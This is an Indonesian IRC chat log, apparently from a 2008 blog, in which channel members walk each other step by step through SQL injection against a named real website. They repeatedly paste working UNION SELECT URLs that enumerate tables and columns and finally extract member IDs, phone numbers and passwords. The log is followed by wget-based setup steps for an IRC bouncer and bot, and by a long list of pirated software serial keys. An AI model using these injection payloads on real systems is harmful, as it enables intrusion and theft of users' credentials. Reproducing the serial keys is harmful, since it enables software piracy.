<+SaPi`KeReN> trus boss
<+arioo> biar binung admin na
<+arioo> kewkeqkqekqeqe
<+arioo> :D
* arioo was kicked by Help (Stop flooding!)
<+anti_polda> bius...
* arioo (still@cowok.paling.ganteng.se.mildnet) has joined #nyubicrew
<+Ibenk_19_Hoki> koaekoakwekoaew
<@live> arioo <- gak pernah mandi
<+anti_polda> sloki itu usernya???
<+katro> yok lanjut2
peler neh help
<+Ibenk_19_Hoki> jiakakkaka
-,-`
<+anti_polda> sloki itu usernya???
<&home_edition2001> where%20table_schema=database()%20limit%200,1/* << ini buat sortirnya ngerti kan klo ini
<+anti_polda> sloki itu usernya???
<&home_edition2001> anti_polda iya tau
* +NenneN pamid dolo (mau saur)
<@live> MILDnet Info : FORUM Visit our official FORUM at http://mildnet.net
<+katro> from nya diganti kan ?
<+NenneN> buaibaiii semua
<&home_edition2001> dilanjut
<%NoGe> bius kurang ngerti
* +NenneN (beguGanjan@NenneN.users.mildnet.org) has left #nyubicrew
<+Ibenk_19_Hoki> NenneN pamid dolo (mau saur) <<-- belum lebaran boss ??
* live sets mode: +v arioo
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20where%20table_schema=database()%20limit%200,1/*
<+katro> ?
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tableswhere%20table_schema=database()%20limit%200,1/*-- << wew
<&home_edition2001> bukan disitu
<+arioo> yang kagak ngerti silakan baca dari atas tuh asli di jelasin mendetail ama oms homo
<+arioo> kwekwkewe
<+arioo> :D
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables where%20table_schema=database()%20limit%200,1/*-- << wew
<&home_edition2001> sial la arioo
<%NoGe> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<&home_edition2001> sapa yang log dari pertama biar di upload
<+arioo> xixixixix
<+arioo> :D
<&home_edition2001> kasian yang lom tau
<+katro> gue log dari awal udah dilanjut dulu
<+arioo> kwekwekwe
<+katro> sampe kelar
<+Ibenk_19_Hoki> jiakakkakakaka
<+haLah> lanjud
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,1,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables where%20table_schema=database()%20limit%200,1-- << ni yang bener
<+arioo> tuh si Ibenk_19_Hoki
<%NoGe> tu si katro ngelog
<+arioo> tuh log
<+arioo> xixixix
<+arioo> :D
<+Ibenk_19_Hoki> ulangin dunks tutor nya
<+Ibenk_19_Hoki> :D
<+Ibenk_19_Hoki> jiaikaka
<+Ibenk_19_Hoki> dari awal yah...
<+Ibenk_19_Hoki> :P~
<%NoGe> 1
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> back
<+arioo> ulangin dunks tutor nya
<+arioo> :D
<+arioo> jiaikaka
<+arioo> dari awal yah...
<+arioo> :P~
<+arioo> wwew mo buat oms homo naaek darah turun titid neh
* arioo was kicked by Help (Stop flooding!)
* arioo (still@cowok.paling.ganteng.se.mildnet) has joined #nyubicrew
<@live> arioo <- Wong Sinting
-,-1
<%NoGe> wakwkakwakwkak
<+katro> 1
<&home_edition2001> table_namenya lupa tu
<+katro> 3
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--
<+katro> [Download Document : 7]
<+katro> Last Update 8
<&home_edition2001> tu yang udah fix
<%NoGe> esia_ams_categories
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> back
<%NoGe> tuh
<&home_edition2001> <%NoGe> esia_ams_categories << tabel 1
<&home_edition2001> gimana untuk tabel ke 2 nya
<%NoGe> ya
* live sets mode: +v arioo
<%NoGe> satu2 ngeluarin ne
<+katro> esia_ams_categories
<+katro> 3
<+katro> [Download Document : 7]
<+katro> Last Update 8
<+katro> back
<&home_edition2001> iya NoGe
<&home_edition2001> iya NoGe
<&home_edition2001> iya NoGe
<%NoGe> ganti table_name
<%NoGe> ganti table_name
<&home_edition2001> 0,1-- << look at
<&home_edition2001> mainindisitu aja
<&home_edition2001> 0,1-- << tabel 1
<&home_edition2001> 1,1-- << tabel 2
* %NoGe inget ne .asp
<%NoGe> iks
<&home_edition2001> 2,1-- << tabel 3
<&home_edition2001> 3,1-- << tabel 4
<&home_edition2001> dst
<&home_edition2001> sampe abis
<&home_edition2001> wakaka
<&home_edition2001> mudah kan
<%NoGe> esia_ams_cs
<%NoGe> 3
<%NoGe> ya ya
<&home_edition2001> NoGe
<&home_edition2001> lo log kan semua nya dari awal
<+Ibenk_19_Hoki> ntar klo dah berhasil.. kasi tau yah..
<+Ibenk_19_Hoki> kekke
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20--
<&home_edition2001> gw males bikin tutor enakan live kaya gini
<%NoGe> iya
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%20 0,1--
<+katro> itu yach
<+katro> yg dimaenin
<%NoGe> gw log say
<+katro> string ujungnya
<%NoGe> aw aw
<&home_edition2001> hasilnya ketauan kan
<&home_edition2001> xixi
<+Ibenk_19_Hoki> gw males bikin tutor enakan live kaya gini <<-- ajarin gw nyuri satelite broo !!
<&home_edition2001> cari gih tabel mana yang menarik
<+Ibenk_19_Hoki> live yah
<&home_edition2001> nyurisatelit mudah bro
<&home_edition2001> wakaka
<&home_edition2001> lo yang gwsuruh2 ya
<&home_edition2001> wakaka
<+Ibenk_19_Hoki> terbang lagi ?
<+katro> tadi users
<+katro> di tabel keberapa ya
<&home_edition2001> wew
<+Ibenk_19_Hoki> kekek
<&home_edition2001> coba gih
<&home_edition2001> gw lag ne
<+arioo> nyurisatelit mudah bro <-- mantabbb
<&home_edition2001> gw gak browsing ne
<&home_edition2001> pake khayalan aja
<+Ibenk_19_Hoki> owh..
<+Ibenk_19_Hoki> jeekeke
<+katro> bah
<%NoGe> esia_member
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> back
<%NoGe> kek ne menarik tu
<&home_edition2001> gw dah apal langkah2nya
<%NoGe> :p
<+Ibenk_19_Hoki> kalo nerbangin nuklir US gimana cara nya broo ?
<&home_edition2001> wew
<&home_edition2001> oke
<&home_edition2001> sep
<+katro> NoGe : sampe username
<+Ibenk_19_Hoki> kekeke
<&home_edition2001> kita bongkar member ya
<+Ibenk_19_Hoki> mau gilak ini gw
<&home_edition2001> setubuh
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20limit%206,1--
<%NoGe> tuh
<%NoGe> 6
<&home_edition2001> ok
<&home_edition2001> sep
<+katro> oh 6,1
<%NoGe> yuuu
<%NoGe> liad member ne
<+SaPi`KeReN> sep
<%NoGe> :p
<&home_edition2001> skarang pake information_schema.column
<+katro> esia_member
<+katro> 3
<+katro> [Download Document : 7]
<+katro> Last Update 8
<+katro> back
<&home_edition2001> INFORMATION_SCHEMA.columns << ni injek selanjutnya
<&home_edition2001> cemana nyusunnya
<+arioo> skarang pake information_schema.column <--- udah mulai ke pusat saraf neeh
<+arioo> kwekwekwe
<%NoGe> hehehe
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_schema=database()%20limit%206,1--
<&home_edition2001> wakaka
* +chawanua (Oscar-Luig@Hate-My.self) Quit (Client exited on MILDNet)
<+katro> ?
<&home_edition2001> table_name diganti column_name
<%NoGe> ga bisa bius
<%NoGe> iya
<+Bukan-Diriku> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20INFORMATION_SCHEMA.tables%20where%20table_schema=database()%20limit%2016,1--
<+arioo> ,table_name,2
<+arioo> kwekwekwe
<&home_edition2001> information_schema.tables diganti information_schema.column
<+arioo> :D
<&home_edition2001> trus
<%NoGe> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sloki/user/myesiacom/sites/myesia.com/www/pagecontent.inc.php on line 177
<&home_edition2001> table_schema=database() diganti table_name=esia_member
<&home_edition2001> coba susun Bukan-Diriku
<&home_edition2001> NoGe
<&home_edition2001> gw liat udah bener lom
<&home_edition2001> logikannya
<+katro> beh error
<&home_edition2001> jangan langsung dolo la
<&home_edition2001> paste sini dolo
<&home_edition2001> biar pa guru priksa
<&home_edition2001> yang salah di tiom ya
<+arioo> weks -.-`
<+Ibenk_19_Hoki> pantad na
* +arioo kaboor aah entar di tiom pak guru
<+Ibenk_19_Hoki> kekeke
<@live> MILDnet Info : VHOST Need Vhost for your nick?? join #help for further detail
<&home_edition2001> yang bener di tusuk bokong nya
<+haLah> wakakkakakaka
<+arioo> wetew
<+Ibenk_19_Hoki> kekekek
<+arioo> tambah parah
<+arioo> -,-`
<&home_edition2001> yang gak ngumpulin homo
<+arioo> mendingan kagak jadih deh ulik ulik na
<+arioo> kqkqqekeqkeqkqekeqkqe
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member%20limit%206,1--
<+arioo> wetewww
<%NoGe> ?
<+arioo> serba salah
<+arioo> quit aah
<+arioo> kwkwekekeqkeq
<+Ibenk_19_Hoki> yg di bahas ini ngasilin duit ga sih ?
<+katro> error sloki melulu
<&home_edition2001> 6,1-- << balik kesemula donk om
* chawanua (Oscar-Luig@BD2BF88A.C22E7E96.8DFA7C87.IP) has joined #nyubicrew
<&home_edition2001> jadi 0,1-- lagi
<+arioo> yg di bahas ini ngasilin duit ga sih ? <-- tergantung iman nya oms
<+arioo> kwekwekwe
<+arioo> :D
<&home_edition2001> knapa erorr
<&home_edition2001> xix
<+Ibenk_19_Hoki> arioo : kekekek
<+arioo> kwekkwekwe
<+arioo> :D
<+Ibenk_19_Hoki> seriuss amat
<+katro> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member%20limit%206,1--
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member%20limit%200,1--
<%NoGe> :))
<+katro> nah si NoGe
<+arioo> kwewkwe
<+arioo> :D
<+anti_polda> &page=newsdetail&news=-27%20union%20select%200,table_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=esia_member()%20limit%200,1--
* %anakbugis (anakbugis@anakbugis.users.mildnet.org) Quit (Quit from MILDNet: )
<&home_edition2001> NoGe isa keluar gak hasilnya
<+anti_polda> jadi gini maksudnya
<%NoGe> ga
<&home_edition2001> NoGe isa keluar gak hasilnya
<%NoGe> masih error
<&home_edition2001> wakaka
<&home_edition2001> sabar
<&home_edition2001> esia_member << di convert ke hexa
<&home_edition2001> gih sana
* live sets mode: +v chawanua
<+katro> hexa
<+katro> btr
<&home_edition2001> gw gak isa browse lag bener
<+arioo> :D
<%NoGe> eh dimana?
<+arioo> xixixx
<+arioo> pakek mysql aza bisa tuh
<+arioo> :D
* +[^]YAMAHA[^] Gebet ceweknya embat dollarnya !
<+katro> bentar gue convert
<&home_edition2001> http://www.piclist.com/techref/ascii.htm
<%NoGe> ok katro
* +arioo brb mo cari makanan dulu laperrr
<+arioo> xixix
<+arioo> :D
<&home_edition2001> paste sini
<&home_edition2001> biar gw susun ulang
<&home_edition2001> jangan lupa dikasih pemanis ya
<&home_edition2001> 0x
<&home_edition2001> wakka
<&home_edition2001> a
<&home_edition2001> kek bedak aja
<+katro> oh pake 0x
<+katro> Result:
<+katro> esia_member
<+katro> converts to:
<+katro> 65 73 69 61 5f 6d 65 6d 62 65 72
<+Ibenk_19_Hoki> koq site nya ga brubah2 dari tadi..
<+katro> 0x650x730x690x610x5f0x6d0x650x6d0x620x650x72
<&home_edition2001> 657369615F6D656D626572 << ini dodol
<&home_edition2001> jadi 0x657369615F6D656D626572
<&home_edition2001> susun lagi yu
<%NoGe> next
<%NoGe> :p
<&home_edition2001> <%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=0x657369615F6D656D626572%20limit%200,1--
<+katro> wekekekek
<+haLah> sama aja
<%NoGe> sama bius
<+haLah> wixiixix
<%NoGe> :))
<+katro> sloki lagi
<&home_edition2001> waka
<&home_edition2001> knapa ya
<&home_edition2001> duh
<+arioo> xixixix
<+arioo> :D
<%NoGe> tanya napa?
<%NoGe> sapa disini punya fake id?
<&home_edition2001> ok cek satu2 ya
<&home_edition2001> wakaka
<&home_edition2001> kurang s
<&home_edition2001> wakaka
<&home_edition2001> wakaka
<&home_edition2001> information_schema.column << pake s
<&home_edition2001> wakaka
<&home_edition2001> information_schema.columns
<+haLah> lol
<%NoGe> ah iya
<%NoGe> reg_id
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> tu
<&home_edition2001> coly2
<&home_edition2001> coly2
<&home_edition2001> coly2
<&home_edition2001> wew
<+katro> wekekek
<&home_edition2001> mantab
<&home_edition2001> lagi kek cari tabel
<%NoGe> esia_id
<%NoGe> 3
<%NoGe> [Download Document : 7]
<&home_edition2001> paste sini kolomnya semua NoGe
<&home_edition2001> wew
<&home_edition2001> wew
<&home_edition2001> wew
<%NoGe> manteb tu
<+Bukan-Diriku> Gold 0.006471 0.2013 4.86 <-- lom bisa bli rokok neh
<%NoGe> xixixi
* manusiabiasa (masbak01@MILD-A77939E2.ipt.aol.com) has joined #nyubicrew
<%NoGe> tu aje bius
<%NoGe> :))
<+Bukan-Diriku> Gold 0.016874 0.5248 12.67 <-- cialll... nambah lage.... Y_Y
<+katro> reg id esia id
<%NoGe> nomer
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> :))
<+chawanua> kesimpulan masih lama
<&home_edition2001> wew
<&home_edition2001> Bukan-Diriku
<&home_edition2001> swet
<&home_edition2001> mantab bgt
* live sets mode: +v manusiabiasa
<&home_edition2001> semua la biar tuntassss
<%NoGe> password
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> xixixi
<@live> MILDnet Info : CHANNEL MILDnet Network support this following channels #MILD #INDOMP3 #GANTENG #NYUBICREW #HITAMPUTIH #POET #MILW0RM
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%204,1--
<+katro> 4,1
<%NoGe> kelamin
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> ini dia
<%NoGe> kelamin
<%NoGe> wkawkakwkawkakwa
<&home_edition2001> maksudnya
<&home_edition2001> maksudnya
<+katro> lahh kelamin
<+katro> :(
<&home_edition2001> wakaka
<&home_edition2001> wong aneh
<+katro> L/p
<+katro> :(
<%NoGe> kelamin ganda
<%NoGe> :p
<&home_edition2001> wakaka
<&home_edition2001> dodol
<+arioo> wetew
<+arioo> kwekwekwekwe
<+arioo> :D
* +arioo lirik lirik oms homo xixixixixix
<&home_edition2001> klo udah paste semua ya colomnya
<&home_edition2001> xixix
<&home_edition2001> << enak ya tinggal nyuruh2
<+katro> aduh ribet dah gue sambil kerja
* +The_Corrs (The_Corrs@MILD-EF271472.ipt.aol.com) Quit (Ping timeout)
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%2025,1--
<%NoGe> banyak ajah
<+arioo> kwekwekwekwewe
<+arioo> :D
<&home_edition2001> wew
<+arioo> hajarrr terusss
<&home_edition2001> masa
<+arioo> wkekwekwe
<+arioo> :D
<&home_edition2001> paste sini semua colomnya
<+katro> wakakak 25,1
<+katro> :p
* +logong (logong@logong.users.mildnet.org) Quit (Quit from MILDNet: Leaving)
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%2030,1--
* +katro cengar cengir
<%NoGe> wkawkak
<+katro> NoGe : tes 100.1
<+katro> :p
<+arioo> jiwakwkwkwkwkwakawakwawkwakwa
<+arioo> :D
<&home_edition2001> srius dol
<+katro> NoGe : tes 100,1 klo keluar mending cari table yg laen
<+katro> :p
<+arioo> iyee pak guru maaff
<+arioo> ^^!
<%NoGe> 33
<&home_edition2001> razia
<+Ibenk_19_Hoki> Hoaahhmm.. NGANTUK AWAK
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%2033,1--
<%NoGe> abis
* home_edition2001 sets mode: -h NoGe
<+Bukan-Diriku> table_name=0x657369615F75736572 <-- mending langsung ene ajah pak de....
* home_edition2001 sets mode: -o LamerCrew
ew
<&home_edition2001> mpos
* LamerCrew slaps home_edition2001 around a bit with a large trout
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
pletakkkkkkkkkkkk
<&home_edition2001> wakaka
<&home_edition2001> gak kena
-_-'
<&home_edition2001> gw ngeles
CBD
* LamerCrew sets mode: -o home_edition2001
<&home_edition2001> akaka
<+NoGe> udeh
bwekekkekkee
<+Bukan-Diriku> kkkeeeek
<+Bukan-Diriku> mpozz
<&home_edition2001> curang irop
<+Bukan-Diriku> macem2 ma staff
<&home_edition2001> ampun la
<&home_edition2001> wakaka
^_^
<+NoGe> udahan ya?
* +SM4LL_F15H (4B1T@SM4LL_F15H.users.mildnet.org) Quit (Quit from MILDNet: )
<+chawanua> 0x657369615F6D656D626572%20limit%2030,1--
<+anti_polda> kayaknya sih gitu
<+NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572--
<+anti_polda> remark
<+anti_polda> 3
<+anti_polda> [Download Document : 7]
<+anti_polda> Last Update 8
<+chawanua> 0x657369615F6D656D626572%20limit%2035,--
<&home_edition2001> wew
<&home_edition2001> wew
* The_Corrs (The_Corrs@MILD-EF271472.ipt.aol.com) has joined #nyubicrew
<+NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572-- <--- ene aje kata omz Bukan-Diriku
<+NoGe> :p
<+Bukan-Diriku> langsung ke inti na ajah
<+katro> yup
<+Bukan-Diriku> mosok muter2 ke esia_member
<+NoGe> he`eh
hu uh
<+manusiabiasa> xixiixixixixixi
ayo ke intinya
* anakbugis (IceChat7@631DADA7.D432F25F.392EBD7B.IP) has joined #nyubicrew
<+katro> email
* &home_edition2001 kelas ditutup
<+katro> 3
<+katro> [Download Document : 7]
<&home_edition2001> mpos
<+katro> Last Update 8
<+katro> password
* +Bukan-Diriku slaps LamerCrew around a bit with a large trout
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
<+Bukan-Diriku> behhh
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
* live sets mode: +v The_Corrs
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
beh
* &home_edition2001 kelas ditutup
<+manusiabiasa> wede
<+Bukan-Diriku> asuuuuuuuuuuuuuu
<+manusiabiasa> sadis amat
* +Bukan-Diriku (-@anak.tampan.dan.soleh.boo) has left #nyubicrew
* Bukan-Diriku (-@anak.tampan.dan.soleh.boo) has joined #nyubicrew
* Help sets mode: +o Bukan-Diriku
<@Bukan-Diriku> KICK home_edition2001 is a channel admin <--- -_-!!
gadisss amat si homo_edition2001 ene
nafsuu deh
<+NoGe> sapa disini punya fake id?
* live sets mode: +v anakbugis
<+[^]YAMAHA[^]> home_edition2001 kami belajar ada bayar yuran sekoyah bapak..!!
<+[^]YAMAHA[^]> :D
<+anti_polda> ya.....belum jg selesai
<@live> MILDnet Info : FORUM Visit our official FORUM at http://mildnet.net
<+anti_polda> kampret
<+manusiabiasa> ada apa neh bos
<+haLah> tauk negh
<+manusiabiasa> kok pake kampret segala
<+haLah> cape degh
<+SaPi`KeReN> reg_id
<+manusiabiasa> wedew
<+SaPi`KeReN> 3
<+SaPi`KeReN> [Download Document : 7]
<+SaPi`KeReN> Last Update 8
<+SaPi`KeReN> esia_id
<+SaPi`KeReN> 3
<+SaPi`KeReN> [Download Document : 7]
<+SaPi`KeReN> Last Update 8
<+SaPi`KeReN> nomer
<+SaPi`KeReN> 3
<+SaPi`KeReN> [Download Document : 7]
<+SaPi`KeReN> Last Update 8
* SaPi`KeReN was kicked by Help (Stop flooding!)
* SaPi`KeReN (sapi@kampret.la) has joined #nyubicrew
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,esia_id,2,nomer,4,5,6,password,nama,9,10,11%20from%20esia_member--
<&home_edition2001> hajar bleh
<+chawanua> waduch ..
anjrit....
<&home_edition2001> pasti dah ngertikan perintah ini
<&home_edition2001> wakaka
kena kick
<+manusiabiasa> aku angkat tangan lah
?
<&home_edition2001> itu gak pake concat
<&home_edition2001> coba pake concat
* Help sets mode: +h anakbugis
* live sets mode: +v SaPi`KeReN
<&home_edition2001> kaya yang pertama tadi lo
<+katro> coba pake concat <-- coba gimana hayoo
<+chawanua> 0x657369615F6D656D626572%20limit%2025,1-- first NoGe Paste
* danieL is now known as pecinta_buku_komik
* +garong (zaly_Assal@MILD-EC7824ED.ipt.aol.com) Quit (Quit from MILDNet: )
<&home_edition2001> NoGe
<&home_edition2001> ngerti ga
<&home_edition2001> Bukan-Diriku
<&home_edition2001> ngerti ga
<+chawanua> 0x657369615F6D656D626572%20limit%2030,1-- NoGe Paste
<@Bukan-Diriku> pala gw yang stress... bukan sql na
<+chawanua> 2025,1 <====
* +Rontok_Bro (embonk@embonk.my.nickname) Quit (Ping timeout)
<+chawanua> 2030,1-- <====
<+NoGe> sampe 33 tadi abis ne
<+katro> Result:
<+katro> 0x657369615F6D656D626572
<+katro> converts to:
<+katro> esia_member

BIKIN PSYBNC

2008-03-21T08:24:00.001-07:00

############################
#”Cara bikin simple psybnc #
############################
1. login shell anda
2. wget geocities.com/mr_chatting_gtl/psy.tar.gz
3. tar -zxvf psy.tar.gz
4. cd .dat
5. ./config port-psybnc
misal : ./config 123456;./fuck;./run
jadi di mirc anda akan menggunakan /server ip-shell:123456
Selamat Mencoba

BIKIN BOT

2008-03-21T08:23:00.000-07:00

Bikin bot Eggdrop | # | IRC — Administrator @ 10:08 pm

Heleh….ga da yg mutu ya…kok mesti posting soal chating mulu…Eit jangan salah ini cuman buat catatan ku koh… :p kalo kamu ga setuju it`s okay ga usah di baca aja :p. Neeh… buat yang butuh ( terutama aku neh….) aku jelasin cara bikinnya :
1. Kamu login dulu ke shell kamu….
2. Kamu download tuh file eggdrop nya…

wget http://www.geocities.com/nic_fajar/eggz.tgz

3. Kalau udah..kamu unzip file nya …

tar -zxvf eggz.tgz

rm -r eggz.tgz ———–kalo file nya dah kepake di hapus aja….

4. Terus masuk ke ke folder eggz

cd eggz;ls -al

5. Terus masuk ke folder scripts

cd scripts;ls -al

6. Abis itu download tcl na….

wget http://channels.dal.net/biru/biru.tcl

tcl tu punyanya Abah di channel #biru hehhe kapan2 u mampir aja ke situ :D skalian minta ajarin ama Abah…thx Abah :D

7. Terus u edit pake editor vi ato pico, misal pake vi..

vi biru.tcl
terus cari yg perlu di edit, dah ada printahnya loh…., terus kalo sudah..tekan Esc abis itu tekan :wq

:wq ————–ini perintah keluar dan menyimpan..

8. Udah ?terus masuk ke folder eggz lagi…

cd ..;ls -al

9. Cari file yg bernama bot.txt terus edit pake vi lagi.. kek tadi…sesuai kebutuhan…heheh mulai males neeh.. :P
jika bot.txt tidak ada maka kamu donlod dulu deh…

wget http://www.geocities.com/nic_fajar/bot.txt

10. Kalo semua udah lengkap, tinggal di idupin tuh bot kamu… :D

./eggdrop -m bot.txt

11. Abis itu kamu msg nick bot kamu sama ngasih password nyaa

/msg botnick pass passwordnya

Heheheh dah jadi deh.. gampang ya.. :P dah gitu aja kalo da yg salah ya mohon di maapin…. okay..

Turnuwun
Fajar Saechun ( pitiq@dalnet )

SERIAL NUMBER

2008-03-21T08:21:00.001-07:00

Adobe Acrobat v8.0 Professional
1118-1341-3925-5595-8141-7680
1016-1992-9210-9981-1392-2870
1118-1719-9236-6727-3285-3211
1016-1757-9008-0389-1405-2509
1118-1295-7743-3899-5988-7217
1016-1553-1956-8803-7545-2920

» AVG Anti-Virus Professional v7.5.446.965
70-THXMV1-PD-C21-S9TX8-J48-2YW6
70-THXMV1-P6-C21-SMNP6-PXB-BHNI
70-THXMV1-PU-C21-S9N5S-RJU-NT7V
70-THXMV1-PK-C21-SN6VE-RND-C3AZ
70-THXMV1-PI-C21-SV3N-KEF-MBC2

»AVG.Anti-Virus.Professional.7.5.476.Build.1043
70-TVTMH4-PR-C21-S6CFV-APY-6BJ6
70-THXMV1-P2-C41-S5GMA-UMF-ESX7
70-TF18C1-P5-C12-SPLPL-PXZ-L7LM

» AVG Anti-Spyware 7.5 Plus
75SP-TH1VD1-P09-C01-S30MUE-NNK-I1X8
70AM-TH1DZ1-PL-C05-S22AFR-94U-E7Z0

» AVG Anti-Spyware v7.5.0.50
70EW-TH17Q1-PM-C01-S1W2QD-MEM-NUYY

» Anno 1701
F5ESL-JV4HJ-2QLJ5-4LN7G-HYSNO-H4DDV-HM7NN-9KWSZ

» Adobe Photoshop CS2 v9.0
S/N: 1045-0436-9551-0266-5984-9386

» Adobe Photoshop Lightroom v1.0
116044770382008492207154
116045641847731830470143
116045913624002835701237
116047564730034623372249
116040029137790379586954

» Adobe Photoshop Lightroom v1.0
1160-4301-7977-0221-2925-0568

B

C

» Cyberlink PowerDVD Deluxe v7.0.2211
MMWJC-FRW4Z-677TV-YC8US-ZLYV3-KPW7B
WE8LG-MENE9-QGNVQ-LNPCF-F5AVD-8URP5
28FC9-URJA8-NDJA5-QVPQJ-EEB4M-2FZQM
GLRGH-A6CS6-X8BTA-CGA6A-KHDCK-4KUW4
TGRZP-QQQUU-X49A5-HC9KJ-QSA8S-9PMMP

» Command And Conquer 3: Tiberium Wars - Kane Edition
HKM5-YD73-72H6-B273-6FLT

» Caricature Studio v2.0
NAME : The Bitter End
SERIAL: 5-2Q540AQW43DHMLD8D

» CyberLink PowerDVD 7
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ 6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR 824RZ-WQA6F-RBVAM-5W9N8-EX3HL-QDU42

D

» DSL Speed v3.8
User Name : TEAM TBE
Serial : PDDI33L6JTW6

E

F

G

» Google Earth Pro
Name: Shinder Jandu
S/N: JCPM7DVNY6MRE3G
Password: 123456789

» Guitar Pro v5.2
USER ID: SERIALBAY.COM
KEY ID: AAAAA-AW50A-AAAAZ

H

I

J

K

» Kaspersky 6.0
S/N: tybgedtyhr4rthtyh

» Kaspersky Internet Security v6.0.1.411
DZ3A3-7XGVU-DH1YX-NXJYP

L

M

» MOBILedit! v2.3.0.4
Name: RU-Board
Activation Key: MRRMU-FHAD9-VUC5V-EY4A0-5M0MA

» MOBILedit! v2.2.0.3
Activation Key: F5FN3-FHADT-D7TS7-FM4FK-YLHJ1
Name: Eugenio Battistini
Company: Empty Field

» MICROSOFT OFFICE 2007
KGFVY-7733B-8WCK9-KTG64-BC7D8

» Microsoft Office 2007 Pro
TT3M8-H3469-V89G6-8FWK7-D3Q9Q

» Microsoft Office Professional 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8

» Microsoft Windows XP Profesional SP 2
WGP2M-G8M6T-BT7D4-P7RY7-27K76
VYKFM-8WQD3-PQC2R-MB9YV-X3JFG
k2kb2-bdbgv-kp686-d8t7x-hdmq8

» Microsoft Windows xp Professional
S/N: FCKGW RHQQ2 YXRKT 8TG6W 2B7Q8

» Microsoft Office 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8

» Microsoft Windows Vista Ultimate
YFKBB-PQJJV-G996G-VWGXY-2V3X8

» Windows Vista
